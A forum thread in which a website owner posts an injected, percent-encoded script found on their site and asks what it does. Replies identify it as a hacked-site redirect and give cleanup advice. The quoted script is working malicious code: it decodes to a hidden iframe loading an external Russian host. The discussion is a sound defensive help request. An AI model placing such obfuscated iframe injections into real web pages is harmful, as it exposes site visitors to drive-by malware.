|
Malicious Code in Website - WTF? .. Someone tell me what do this do?
Code:
<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%35%34%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%74%72%61%66%66%75%72%6c%2e%72%75%2f%73%6c%69%76%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%39%34%39%32%30%29%2b%27%61%64%63%36%36%63%39%35%30%5c%27%20%77%69%64%74%68%3d%34%34%33%20%68%65%69%67%68%74%3d%34%34%30%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script> |
not going to decode it but typically that stuff usually links to some russian site somewhere, thats what I've seen when it happened to me a while back
|
like jetjet said, it is encoded and it is an url... to some codec download or something like that...
which means you got hacked. fix it asap(ideally a reinstall), temporary you can change the perm on your html/php files and remove the code and that will do it. |
Thanks for the tips guys. A little search shown it connects to traffurl.ru (DO NOT VISIT) .. not sure what it do, must be downloading something.
Website in question is static (plain html), but uses MultiBox to to show larger view of images in a fashioned way, and a contact page using php form. I have checked the MultiBox thing, they do have update (i am gonna do that), but no vulnerability is reported or so .. must have something related to contact form or permissions. gonna check.. thanks again. |
| All times are GMT -7. The time now is 06:17 AM. |
Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123